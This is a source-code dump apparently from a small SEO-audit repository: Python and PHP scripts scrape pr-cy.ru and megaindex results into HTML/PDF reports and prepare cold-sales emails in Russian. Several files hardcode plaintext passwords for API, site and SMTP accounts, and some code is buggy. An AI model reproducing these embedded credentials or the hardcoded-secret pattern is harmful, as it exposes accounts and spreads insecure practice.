(len(name.cssselect('.content-test')[0].cssselect('.progress-info')) > 
0):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('span')) > 0) or ('Системы статистики' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('span')\n\t\t\t\t\t\t\tfor analytics in newList2:\n\t\t\t\t\t\t\t\tf.write(clearStr(analytics.text))\n\t\t\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\telif (len(name.cssselect('.info-test')) > 0):\n\t\t\t\t\t\tif('Местоположение сервера' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(name.cssselect('.content-test img')[0].get('alt').split(' ')[2])\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif('Favicon' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tif(name.cssselect('.check-test')[0].get('test-status') 
== 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\t\tf.write('Отлично, у сайта есть Favicon.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\t\telif(name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\t\tf.write('Отлично, у сайта есть Favicon.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\ti += 1\n\t\t\t'''f.write('<td>')\n\t\t\tnewList3 = name.cssselect('.description p')\n\t\t\tfor paragraph in newList3:\n\t\t\tf.write(paragraph.text)'''\n\t\tf.write('</tbody>')\n\t\tf.write('</table>')\n\t\tf.write('''<p> Резолюция\nСайт частично оптимизирован.</p>\n\t\t</body>\n\t\t</html>\n\t\t\t''')\n\t\tf.close()\n\t\tfile = HTML(filename=\"audit/\" + customerList[1] + \".html\")\n\t\tfile.render().write_pdf(target=\"audit/\" + customerList[1] + \".pdf\")\n\t\t#file.render('file://' + os.getcwd() + '/audit/' + customerList[1] + '.html', 'audit/' + customerList[1] + '.pdf')\n\t\tsubject = customerList[0] + ' - подготовили аудит вашего сайта: ' + customerList[1]\n\t\tmessage = customerList[0] + \"\"\", добрый день!\n\nПричина нашего обращения к Вам не случайна.\n\nСпециалистами студии Дмитрия Биксилеева в течение марта месяца проводился выборочный аудит сайтов компаний работающих в сфере услуг для бизнеса. В том числе был проведен краткий аудит Вашего сайта %s\n\nНашими SEO-специалистами выявлены достаточно серьезные ошибки на сайте, мешающие его продвижению в поисковых системах и снижающие удобство пользования вашим сайтом для ваших потенциальных клиентов (см. приложение «Экспресс аудит сайта»). 
Как правило, данные ошибки не заметны на первый взгляд, но об их наличии убедительно свидетельствует низкий КПД сайта.\n\nНаверное, и Вы сами, как ответственный и экономный хозяин, периодически задаетесь вопросом:\n\nПочему сайт, в который вложено столько интеллектуальных и финансовых ресурсов не оправдывает свое существование?\nПочему клиенты заходят на сайт, но не совершают покупок?\nПочему Ваши конкуренты уводят клиентов?\n\nМы дадим ответы на все интересующие Вас вопросы и с удовольствием поделимся самыми свежими и самыми необходимыми в XXI веке знаниями по интернет-маркетингу. В случае Вашей заинтересованности, сделаем полный базовый, технический и юзабилити аудит сайта, предложим реальные сроки и способы устранения недостатков и выведем Ваш сайт на лидирующие позиции в поисковиках по самым высоко конверсионным запросам.\n\nМы не предлагаем Вам услуги с непредсказуемым или неубедительным результатом. Мы предлагаем взрывной рост Вашему Интернет-бизнесу!\n\nПомогая Вам в бизнесе, мы становимся своеобразным хуком в интернет-продажах, Вашим директором по маркетингу, полностью выстраивающим маркетинг и систему продаж.\n\nС уважением к Вам и Вашему бизнесу, Бубновский Михаил\nДиректор по развитию компании Студия Дмитрия Биксилеева\n\n----------------------------------------------------------\nТел.: +7(343)298-03-54\nСот. 
Тел.: +7 (922)1554515\nE-mail: [email protected]\nskype: ottepel_1\nwww.biksileev.ru\"\"\" % customerList[1]\n\t\t#sendMail(customerList[2], subject, message, 'audit/' + customerList[1] + '.pdf')\n\t\tcustomerList.append('Отправлено')\n\t\toutput.write('\t'.join(customerList))\n\t\toutput.write('\\n')\n\t\ttext1.delete('1.0', str(len('\t'.join(customerList) + '\\n') + 1) + '.0') \n\t\ttext1.insert(str(j) + '.0', '\t'.join(customerList) + '\\n')\n\t\ttext1.update()\n\toutput.close()\n\tphant.quit()\n\n\n\ndef openFile( event ):\n\taskopenfilename()\n\nroot = Tk()\n\n#indexSite( 'biksileev.ru', 'asf', 'asdffdf' )\n\ntext1=Text(root,height=3,width=70,font='Arial 12',wrap=WORD)\n\nmainFrame = Frame(root,width=500,height=100,bd=5)\n\nop = askopenfilename()\n\nbuttonStart = Button(mainFrame, text='Start')\n\n'''nameLabel = Label(mainFrame, text=\"Ваше ФИО (полностью)\")\n\nnameEntry = Entry(mainFrame)\n\nnameLabel = Label(mainFrame, text=\"Ваше ФИО (полностью)\")\n\nnameEntry = Entry(mainFrame)\n\nnameLabel = Label(mainFrame, text=\"Ваше ФИО (полностью)\")\n\nnameEntry = Entry(mainFrame)\n'''\nbuttonStart.bind(\"<Button-1>\", proof2)\n\n#op.bind(\"<Button-1>\", openFile)\n\nmainFrame.pack()\n\ntext1.pack()\n\n#op.pack()\n\nbuttonStart.pack()\n\nroot.mainloop()\n" }, { "alpha_fraction": 0.6455398797988892, "alphanum_fraction": 0.6619718074798584, "avg_line_length": 19.629032135009766, "blob_id": "7851fae8553da15e68126c7101883c7171f880b6", "content_id": "2f6a46393bd60cac9aaa1adc1d110a86fbc3e0e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1284, "license_type": "no_license", "max_line_length": 65, "num_lines": 62, "path": "/proof.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "import requests\nimport urllib.parse\nimport time\nfrom requests.auth import HTTPDigestAuth\n\n'''methods = ('reindex_site', 'get_index')\n\nsites = ('biksileev.ru', 'marvel-gold.ru', 'atl96.ru')\n\nBASE_URL = 
'http://api.megaindex.ru/?'\n\nparamsForReIndex = {\n\t'method': methods[0],\n\t'output': 'json',\n\t'mode': 'site',\n\t'login': '[email protected]',\n\t'password': 'NokiaN9777',\n\t'url': sites[2],\n\t'target': 'reindex',\n\t'version_id': '1',\n\t'count_page': '30'\n}\n\nfirstResponse = requests.get(BASE_URL, params=paramsForReIndex)\nfirstJson = firstResponse.json()\n\nparamsForGetIndex = {\n\t'method': methods[1],\n\t'login': '[email protected]',\n\t'password': 'NokiaN9777',\n\t'url': paramsForReIndex['url'],\n\t'version_id': firstJson['version_id']\n}\n\ntime.sleep(600)\n\nsecondResponse = requests.get(BASE_URL, params=paramsForGetIndex)\nsecondJson = secondResponse.json()\n\nprint(secondJson)'''\n\nsession = requests.Session()\nsession.post('https://id.pr-cy.ru/signup/login/', {\n 'login_email': '[email protected]',\n 'password': 'biksileev',\n 'remember': 1,\n})\n\n\nBASE_URL = 'https://a.pr-cy.ru'\n\nresponse = requests.get('https://id.pr-cy.ru/signup/login/')\n\nprint('Яндекс' in response.text)\n\nf = open('test.html', 'w', encoding='ISO-8859-1')\n\n#msg = str(response.text).encode('cp1251')\n\nf.write(str(response.text))\n\nf.close()" }, { "alpha_fraction": 0.5930232405662537, "alphanum_fraction": 0.6937984228134155, "avg_line_length": 18.846153259277344, "blob_id": "1410d6144892f7709b112680f154a8c4e685fde9", "content_id": "bd0149634b94c3eee182d6b7dea92a2089a76a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 258, "license_type": "no_license", "max_line_length": 56, "num_lines": 13, "path": "/tkproof.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "from tkinter import *\n \nroot = Tk()\n \nfra1 = Frame(root,width=500,height=100,bg=\"darkred\")\nfra2 = Frame(root,width=300,height=200,bg=\"green\",bd=20)\nfra3 = Frame(root,width=500,height=150,bg=\"darkblue\")\n \nfra1.pack()\nfra2.pack()\nfra3.pack()\n \nroot.mainloop() " }, { "alpha_fraction": 0.6156449317932129, 
"alphanum_fraction": 0.6284003853797913, "avg_line_length": 31.14644432067871, "blob_id": "ddf0ab7431bcb0f56069928342174b82a7d118bc", "content_id": "73babb93c944dc309a48a88eb338082d148bd9e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8072, "license_type": "no_license", "max_line_length": 232, "num_lines": 239, "path": "/tryUI2.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*- \nfrom Tkinter import *\nfrom tkFileDialog import *\nimport fileinput\nimport urllib2.requests\nimport urllib.parse\nimport time\nfrom smtplib import SMTP_SSL\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders as Encoders\nimport os\nfrom pdb import set_trace\n\ndef indexSite(site, customerEmail, customerFIO):\n\tmethods = ('reindex_site', 'get_index')\n\n\tBASE_URL = 'http://api.megaindex.ru/?'\n\n\tparamsForReIndex = {\n\t\t'method': methods[0],\n\t\t'output': 'json',\n\t\t'mode': 'site',\n\t\t'login': '[email protected]',\n\t\t'password': 'NokiaN9777',\n\t\t'url': site,\n\t\t'target': 'reindex',\n\t\t'version_id': '1',\n\t\t'count_page': '30'\n\t}\n\n\t#pdb.set_trace()\n\n\tfirstResponse = requests.get(BASE_URL, params=paramsForReIndex)\n\tfirstJson = firstResponse.json()\n\n\tparamsForGetIndex = {\n\t\t'method': methods[1],\n\t\t'login': '[email protected]',\n\t\t'password': 'NokiaN9777',\n\t\t'url': site,\n\t\t'version_id': firstJson['version_id']\n\t}\n\n\ttime.sleep(300)\n\n\tsecondResponse = requests.get(BASE_URL, params=paramsForGetIndex)\n\tsecondJson = secondResponse.json()\n\n\tf = open('textJson.txt', 'w')\n\tf.write(str(secondJson))\n\tf.close()\n\n\tsubject = 'Аудит сайта ' + site\n\n\tmessage = \"Добрый день, \" + customerFIO + \". 
Провели аудит вашего сайта.\"\n\n\tsendMail(customerEmail, subject, message)\n\ndef sendMail(emailTo, subject, msgText, fileAddr):\n\tfilepath = fileAddr\n\tbasename = os.path.basename(filepath)\n\taddress = \"[email protected]\"\n\n\t# Compose attachment\n\tpart = MIMEBase('application', \"octet-stream\")\n\tpart.set_payload(open(filepath,\"rb\").read() )\n\tEncoders.encode_base64(part)\n\tpart.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % basename)\n\tpart2 = MIMEText(msgText, 'plain')\n\n\t# Compose message\n\tmsg = MIMEMultipart()\n\tmsg['From'] = address\n\tmsg['To'] = emailTo\n\tmsg['Subject'] = subject\n\n\tmsg.attach(part2)\n\tmsg.attach(part)\n\n\t# Send mail\n\tsmtp = SMTP_SSL()\n\tsmtp.connect('smtp.yandex.ru')\n\tsmtp.login(address, 'rjcjq12utybq')\n\tsmtp.sendmail(address, emailTo, msg.as_string())\n\tsmtp.quit()\n\ndef proof(event):\n\t#pdb.set_trace()\n\tprint('Start work!')\n\tindexSite(siteEntry.get(), emailEntry.get(), nameEntry.get())\n\tprint('Done!')\n\tsiteEntry.delete(0, len(siteEntry.get()))\n\temailEntry.delete(0, len(emailEntry.get()))\n\tnameEntry.delete(0, len(nameEntry.get()))\n\ndef proof2(event):\n\tgrabPRCY(op)\n\ndef grabPRCY(fileAddr):\n\tfrom grab import Grab\n\n\tdef clearStr( string ):\n\t\treturn string.replace('\\n','').replace('\\t','').replace('\\r','')\n\n\tg = Grab()\n\n\tg.go('https://id.pr-cy.ru/signup/login/')\n\n\tg.doc.set_input('login_email','[email protected]') \n\tg.doc.set_input('password','biksileev')\n\tg.doc.submit()\n\n\tfor string in fileinput.input(fileAddr):\n\n\t\tcustomerList = string.split('\t')\n\n\t\tg.go('https://a.pr-cy.ru/' + customerList[1])\n\n\t\ttime.sleep(10)\n\n\t\tnewList = g.css_list('.is')\n\n\t\ti = 0\n\n\t\tf = open('audit/' + customerList[1] + '.html','w')\n\t\tf.write('''<!DOCTYPE html>\n\t<html>\n\t\t<head>\n\t\t\t<meta charset=\"utf-8\" />\n\t\t\t<link rel='stylesheet' href=\"style.css\">\n\t\t</head>\n\t\t<body>\n\t\t\t<div id=\"head\">\n\t\t\t\t<img 
src=\"biksileev.jpg\"/>\n\t\t\t\t<h1>Технический аудит сайта http://''' + customerList[1] + '''</h1>\n\t\t\t\t<p>Для чёткого понимания текущего технического состояния сайта http://''' + customerList[1] + '''\nбыл проведён полный технический аудит, результаты которого представлены ниже в виде таблицы.</p></div>''')\n\t\tf.write('<table>')\n\t\tf.write('<thead><tr><td colspan=\"2\">Технический аудит</td></tr></thead>')\n\t\tf.write('<tbody>')\n\t\tf.write('<tr><td>Критерий</td><td>Текущее состояние</td></tr>')\n\n\t\tfor name in newList:\n\t\t\tif True: #not('Обратные ссылки' in name.cssselect('.info-test')[0].text) or not('Аналитика' in name.cssselect('.info-test')[0].text):\n\t\t\t\tf.write('<tr><td class=\"left\">')\n\t\t\t\tif len(name.cssselect('.info-test')) > 0:\n\t\t\t\t\tf.write(name.cssselect('.info-test')[0].text)\n\t\t\t\t\tf.write('</td>')\n\t\t\t\t\tf.write(' ')\n\t\t\t\t\tif len(name.cssselect('.content-test')) > 0:\n\t\t\t\t\t\tif (len(clearStr(name.cssselect('.content-test')[0].text)) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write('<img src=\"http://' + name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')[0].get('src')[2:] + '\">')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('a')) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('a')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('p')) > 0):\n\t\t\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('p')\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tfor paragraph in 
newList2:\n\t\t\t\t\t\t\t\tf.write(clearStr(paragraph.text))\n\t\t\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info')) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('span')) > 0) or ('Системы статистики' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('span')\n\t\t\t\t\t\t\tfor analytics in newList2:\n\t\t\t\t\t\t\t\tf.write(clearStr(analytics.text))\n\t\t\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\telif (len(name.cssselect('.info-test')) > 0):\n\t\t\t\t\t\tif('Местоположение сервера' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(name.cssselect('.content-test img')[0].get('alt').split(' ')[2])\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif(('Facebook' in name.cssselect('.info-test')[0].text) or ('ВКонтакте' in name.cssselect('.info-test')[0].text) or ('Google+' in name.cssselect('.info-test')[0].text) or ('Twitter' in name.cssselect('.info-test')[0].text)):\n\t\t\t\t\t\t\tif(name.getparent().cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\t\tf.write('Ссылка на страницу найдена.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif('Favicon' in 
name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tif(name.getparent().cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\t\tf.write('Отлично, у сайта есть Favicon.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\ti += 1\n\t\t\t'''f.write('<td>')\n\t\t\tnewList3 = name.cssselect('.description p')\n\t\t\tfor paragraph in newList3:\n\t\t\tf.write(paragraph.text)'''\n\t\t\tf.write('</tr>')\n\t\t\t\t#f.write('</td></tr>')\n\t\t\t\t#f.write('\\n')\n\t\tprint(i)\n\t\tf.write('</tbody>')\n\t\tf.write('</table>')\n\t\tf.write('''\n\t\t</body>\n\t\t</html>\n\t\t\t''')\n\t\tf.close()\n\t\tsubject = 'Аудит сайта ' + customerList[1]\n\t\tmessage = \"Добрый день, \" + customerList[0] + \". Провели аудит вашего сайта.\"\n\t\t#sendMail(customerList[2], subject, message, 'audit/' + customerList[1] + '.html')\n\t\t#sendMail('[email protected]', subject, message, 'audit/' + customerList[1] + '.html')\n\t\t#time.sleep(10)\n\t\tprint(customerList[0])\n\nroot = Tk()\n\nmainFrame = Frame(root,width=500,height=100,bd=5)\n\nop = askopenfilename()\n\nbuttonStart = Button(mainFrame, text='Start')\n\nbuttonStart.bind(\"<Button-1>\", proof2)\n\nmainFrame.pack()\n\nbuttonStart.pack()\n\nroot.mainloop()\n" }, { "alpha_fraction": 0.5816946029663086, "alphanum_fraction": 0.5938334465026855, "avg_line_length": 32.4878044128418, "blob_id": "71f15c5fca124b4edfecafb03705b728b25048f5", "content_id": "7ad0f4d4a538b9b01f8074da99c0eaafdde84e8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4253, "license_type": "no_license", "max_line_length": 230, "num_lines": 123, "path": "/grabProof.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "from grab import Grab\nfrom ipdb import set_trace\n\ndef clearStr( string ):\n\treturn string.replace('\\n','').replace('\\t','').replace('\\r','')\n\ng = 
Grab()\n\ng.go('https://id.pr-cy.ru/signup/login/')\n\ng.doc.set_input('login_email','[email protected]') \ng.doc.set_input('password','biksileev')\ng.doc.submit()\ng.go('https://a.pr-cy.ru/personabook.ru')\n\nnewList = g.css_list('.is')\n\ni = 0\n\nf = open('prcy.html','w')\nf.write('''\n<html>\n<head>\n\t<meta charset=\"utf-8\" />\n</head>\n<body>\n\t''')\nf.write('<table>')\n\nfor name in newList:\n\ttry:\n\t\t'''if 'Скриншот сайта на смартфоне' in name.cssselect('.info-test')[0].text:\n\t\t\t\t\t\t\t\t\tset_trace()'''\n\t\tif not('Обратные ссылки' in name.cssselect('.info-test')[0].text) or not('Аналитика' in name.cssselect('.info-test')[0].text):\n\t\t\ttempVar = name.cssselect('.info-test')[0].text\n\t\t\tset_trace()\n\t\t\tf.write('<tr><td>')\n\t\t\tf.write(name.cssselect('.info-test')[0].text)\n\t\t\tf.write('</td>')\n\t\t\tf.write(' ')\n\t\t\ttry:\n\t\t\t\tnewVar = name.cssselect('.content-test')[0].text\n\t\t\t\tnewVar = newVar.replace('\\n','')\n\t\t\t\tnewVar = newVar.replace('\\t','')\n\t\t\t\tnewVar = newVar.replace('\\r','')\n\t\t\t\tif len(newVar) > 0:\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(newVar)\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif('Местоположение сервера' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(name.cssselect('.content-test img')[0].get('alt').split(' ')[2])\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif(('Facebook' in name.cssselect('.info-test')[0].text) or ('ВКонтакте' in name.cssselect('.info-test')[0].text) or ('Google+' in name.cssselect('.info-test')[0].text) or ('Twitter' in name.cssselect('.info-test')[0].text)):\n\t\t\t\t\tif(name.getparent().cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\tf.write('<td>')\n\t\t\t\t\t\tf.write('Ссылка на страницу найдена.')\n\t\t\t\t\t\tf.write('</td>')\n\t\t\t\telif('Favicon' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\tif(name.getparent().cssselect('.check-test')[0].get('test-status') == 
'success'):\n\t\t\t\t\t\tf.write('<td>')\n\t\t\t\t\t\tf.write('Отлично, у сайта есть Favicon.')\n\t\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')) > 0):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write('<img src=\"http://' + name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')[0].get('src')[2:] + '\">')\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('a')) > 0):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('a')[0].text))\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('p')) > 0):\n\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('p')\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tfor paragraph in newList2:\n\t\t\t\t\t\tf.write(clearStr(paragraph.text))\n\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')) > 0):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')[0].text))\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('span')) > 0) or ('Системы статистики' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('span')\n\t\t\t\t\tfor analytics in newList2:\n\t\t\t\t\t\tf.write(clearStr(analytics.text))\n\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info')) > 0):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info')[0].text))\n\t\t\t\t\tf.write('</td>')\n\t\t\texcept:\n\t\t\t\tpass\n\t\ti += 1\n\t\tf.write('<td>')\n\t\tnewList3 = name.cssselect('.description p')\n\t\tfor 
paragraph in newList3:\n\t\t\tf.write(paragraph.text)\n\t\tf.write('</td></tr>')\n\t\t#f.write('\\n')\n\texcept Exception:\n\t\t#set_trace()\n\t\tf.write('</td></tr>')\n\t\t#f.write('\\n')\n\t\tpass\nprint(i)\nf.write('</table>')\nf.write('''\n</body>\n</html>\n\t''')\nf.close()\n'''\nfor name in newList:\n\tnewVar = name.text\n\tset_trace()\n\tnewVar = newVar.replace('\\n','')\n\tnewVar = newVar.replace('\\t','')\n\tnewVar = newVar.replace('\\r','')\n\tprint(newVar)\n'''\n" }, { "alpha_fraction": 0.4292944371700287, "alphanum_fraction": 0.4328669309616089, "avg_line_length": 25.046510696411133, "blob_id": "58c306a9196eceef061fd6e8bf0b4472aa8bf96f", "content_id": "fcf4b7df05a0c6e0bfb016a6f4ead4ae53dbe4ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3429, "license_type": "no_license", "max_line_length": 123, "num_lines": 129, "path": "/proof.php", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "<?php\nheader(\"Content-Type: text/html; charset=utf-8\"); \n$methods = array();\n$methods[] = \"reindex_site\";\n$methods[] = \"get_index\";\n$method = $methods[1];\n$sites = array();\n$sites[] = \"biksileev.ru\";\n$sites[] = \"marvel-gold.ru\";\n$sites[] = \"russouvenir.ru\";\n$sites[] = \"blog.biksileev.ru\";\n\n $arr[\"email\"] = \"[email protected]\";\n $arr[\"password\"] = \"NokiaN9777\";\n $arr[\"method\"] = \"add_project\";\n $arr[\"project\"] = $sites[0];\n $arr[\"lr\"][] = \"225\";\n\n\n $array = array();\n $array[\"method\"] = $method;\n $array[\"output\"] = \"json\";\n $array[\"mode\"] = \"site\";\n $array[\"login\"] = \"[email protected]\";\n $array[\"password\"] = \"NokiaN9777\";\n $array[\"url\"] = urlencode($sites[3]);\n $array[\"target\"] = ''; // Необязательный параметр если пустой, вернет дату последней индексации\n $array[\"version_id\"] = \"1\";\n $content = file_get_contents(\"http://api.megaindex.ru/?\".http_build_query($array)); \n $json = json_decode($content); \n 
\nif(!empty($json->error)){\n echo $json->error;\n}\nif($method == $methods[1]){\n$table .= \"<br><br>РЕЗУЛЬТАТ:\";\n$table .= \"<table border=1>\";\n$table .= \"<tr>\";\n$table .= \"<th>page</th>\";\n$table .= \"<th>level</th>\"; \n$table .= \"<th>status</th>\"; \n$table .= \"<th>keywords</th>\"; \n$table .= \"<th>description</th>\"; \n$table .= \"<th>title</th>\";\n$table .= \"<th>h1</th>\"; \n$table .= \"<th>chars</th>\"; \n$table .= \"<th>wc</th>\"; \n$table .= \"<th>quality</th>\"; \n$table .= \"<th>uniq_content</th>\"; \n$table .= \"<th>count_ls_to</th>\"; \n$table .= \"<th>count_ls_from</th>\"; \n$table .= \"<th>count_vs_to</th>\"; \n$table .= \"<th>count_vs_from</th>\"; \n$table .= \"</tr>\";\n \nforeach($json as $array){\n $table .= \"<tr>\";\n \n $table .= \"<td>\";\n $table .= $array->page;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->level;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->status;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->keywords;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->description;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->title;\n $table .= \"</td>\"; \n \n $table .= \"<td>\";\n foreach($array->h1 as $key => $element){ \n $table .= $element.'<br>';\n }\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->chars;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->wc;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->quality;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->uniq_content;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->count_ls_to;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->count_ls_from;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->count_vs_to;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->count_vs_from;\n $table .= \"</td>\";\n \n $table .= 
\"</tr>\";\n}\n$table .= \"</table>\";\necho $table;\n}\nelseif(!empty($json->report)){\n echo $json->report;\n exit;\n}" } ]
7
ekta1999/Portfolio
https://github.com/ekta1999/Portfolio
61a54e05ccb85639ef04ffdb9177c2eb1ba16da0
a56e1252dfe6e4909ce3f769932646e677f076ea
bf51ad5b72ef2b8e6e3894ac3f8ccb9c844c7048
refs/heads/master
2020-04-15T01:55:00.526213
2019-11-03T12:34:10
2019-11-03T12:34:10
164,296,122
1
0
null
null
null
null
null
